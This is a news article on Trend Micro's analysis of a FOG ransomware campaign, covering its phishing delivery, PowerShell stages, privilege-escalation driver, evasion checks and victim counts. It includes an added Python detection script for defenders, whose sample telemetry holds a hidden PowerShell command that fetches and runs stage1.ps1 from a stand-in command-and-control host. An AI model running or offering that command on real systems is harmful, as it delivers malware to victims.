
The initial ransom note that is dropped, which uses DOGE-related references to troll | Image: Trend Micro
Trend Micro has identified a recent campaign involving FOG ransomware, demonstrating the adaptability of cybercriminals in their attempts to compromise systems and extort victims.
First detected between March 27 and April 2, FOG ransomware was observed across nine unique samples uploaded to VirusTotal. These variants shared key indicators: the use of a “.flocked” file extension, a readme.txt ransom note, and DOGE-themed content—a not-so-subtle reference to the U.S. Department of Government Efficiency (DOGE).
“The note also contains instructions to spread the ransomware payload to other computers by pasting the provided code in the note,” Trend Micro’s researchers reported.
The campaign may be operated either by the original FOG authors or by impersonators who repurpose the malware for their own agendas.
FOG ransomware uses familiar tactics to breach defenses. It arrives via phishing emails containing ZIP attachments—specifically, one named “Pay Adjustment.zip” that hides a disguised LNK file made to look like a PDF. When clicked, this file runs a PowerShell command to download a malicious script named stage1.ps1.
“The downloaded PowerShell script performs a multi-stage operation, retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts,” the report explains.
The script even opens politically themed YouTube videos and includes written political commentary—indicating that attackers may be fusing ideological or satirical motives with cybercrime.
The report details the following files found within the payload samples:
- Lootsubmit.ps1: This script gathers system information and exfiltrates it to a remote server. It collects data such as IPv4 gateway IP, MAC address, geolocation data (using the Wigle API), hardware configuration, and system identifiers.
- Trackerjacker.ps1: This script is similar to “lootsubmit.ps1” but includes an updated function for MAC address resolution.
- Qrcode.png: This file displays a QR code directing victims to a Monero wallet address.
- Ktool.exe: This executable facilitates privilege escalation by exploiting a vulnerability in the Intel Network Adapter Diagnostic Driver (“iQVW64.sys”).
FOG ransomware takes pains to evade detection. The loader:
- Performs sandbox checks (processor count, RAM, registry values).
- Decrypts an embedded payload only if the environment appears genuine.
- Drops a dbgLog.sys log and a ransom note identical to earlier FOG variants.
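The infection chain and artifacts described above (LNK-launched PowerShell fetching stage1.ps1, the cwiper.exe/ktool.exe loaders, the iQVW64.sys driver, the readme.txt note and the ".flocked" extension) can be turned into simple host-side hunting logic. The following Python is an added example, not code from the Trend Micro report; the event schema, the sample telemetry, the C2 hostname and the encryption-burst threshold are all constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample telemetry (not from the report): one dict per event, loosely
# modelled on Sysmon process-create, driver-load and file-create records.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://EXAMPLE-C2.invalid/stage1.ps1 | iex"'},
    {"type": "process", "parent": "powershell.exe", "image": "cwiper.exe", "cmdline": "cwiper.exe"},
    {"type": "driver", "image": r"C:\Windows\Temp\iQVW64.sys"},
    {"type": "file", "path": r"C:\Users\alice\Documents\readme.txt"},
] + [{"type": "file", "path": rf"C:\Users\alice\Documents\doc{i}.docx.flocked"} for i in range(40)]

# Indicators named in the report; the burst threshold is an assumed tuning value.
STAGE_SCRIPT_RE = re.compile(r"stage1\.ps1", re.IGNORECASE)
LOADER_NAMES = {"cwiper.exe", "ktool.exe"}
VULN_DRIVER = "iqvw64.sys"
RANSOM_EXT, RANSOM_NOTE = ".flocked", "readme.txt"
BURST_THRESHOLD = 20

def detect_fog_indicators(events):
    """Return a list of (rule_name, detail) hits over a sequence of event dicts."""
    hits = []
    flocked_writes = Counter()  # per-folder count of newly written .flocked files
    for ev in events:
        if ev["type"] == "process":
            if ev["image"].lower() == "powershell.exe" and STAGE_SCRIPT_RE.search(ev.get("cmdline", "")):
                hits.append(("powershell_stage1_download", ev["cmdline"]))
            if ev["image"].lower() in LOADER_NAMES:
                hits.append(("fog_loader_executed", ev["image"]))
        elif ev["type"] == "driver" and ev["image"].lower().endswith(VULN_DRIVER):
            hits.append(("vulnerable_intel_driver_loaded", ev["image"]))
        elif ev["type"] == "file":
            folder, _, name = ev["path"].rpartition("\\")
            if name.lower() == RANSOM_NOTE:
                hits.append(("fog_ransom_note_dropped", ev["path"]))
            elif name.lower().endswith(RANSOM_EXT):
                flocked_writes[folder] += 1
    # Many renames to .flocked in one folder is the encryption phase, not a single stray file.
    for folder, n in flocked_writes.items():
        if n >= BURST_THRESHOLD:
            hits.append(("flocked_encryption_burst", f"{n} files in {folder}"))
    return hits

def rule_names(events):
    """Distinct rule names that fired, sorted, for quick triage or testing."""
    return sorted({name for name, _ in detect_fog_indicators(events)})

if __name__ == "__main__":
    for rule, detail in detect_fog_indicators(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```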
“All discovered variants carry the same payload and only differ on the key used to decrypt the payload,” Trend Micro confirmed.
Since January 2025, the FOG ransomware group has claimed 100 victims, most notably in:
- Technology
- Education
- Manufacturing
- Transportation
Other affected sectors include healthcare, retail, and business services. February marked a peak, with 53 victims.
Among Trend Micro customers alone, there were 173 detections of FOG ransomware activity since June 2024, all of which have been successfully blocked.
“Outpace ransomware threats by monitoring indicators of compromise (IoCs)… to support forensic investigations and enhance threat prevention,” Trend advises.